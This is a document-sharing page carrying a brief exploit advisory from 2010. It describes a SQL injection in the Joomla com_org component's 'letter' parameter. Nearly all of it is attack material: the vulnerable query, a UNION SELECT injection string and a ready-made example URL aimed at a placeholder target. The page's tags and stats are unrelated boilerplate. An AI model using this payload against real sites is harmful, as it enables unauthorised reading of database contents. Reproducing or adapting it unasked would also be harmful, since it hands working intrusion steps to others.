Joomla com_org SQL Injection Vulnerability letter parameter

Report as inappropriate Your report has been received

Shared by: h3m4n

Tags

Main Menu, content management system, Photo Gallery, dynamic portal engine, Free Software, GPL License, Easy Gallery, Track Info, Home Photo, Joomla Templates

Stats

views:: 89
posted:: 5/23/2010
language:: English
pages:: 1

Public Domain

Document Sample

							                       Joomla com_org SQL Injection Vulnerability letter parameter                                 Page 1/1
  1   #   Joomla com_org SQL Injection Vulnerability (letter parameter)
  2   #   Author: kazuya
  3   #   Mail: kazuy0r@gmail.com<mailto:kazuy0r@gmail.com> Jabber: kazuya@jabber.ccc.de<mailto:kazuya@jabber.ccc.de>
  4   #   Greetz to back2hack
  5
  6   # Vulnerability
  7   # Query: SELECT count(*) FROM ‘jos_org‘ WHERE (‘name‘ LIKE ’<sql>%’ || ...
  8   # SQL: ’)+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0−−+f
  9   # Example: http://[target].com/index.php?option=com_org&letter=’)+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0−−+f&
      task=indexs




kazuya                                                                                                              03/15/2010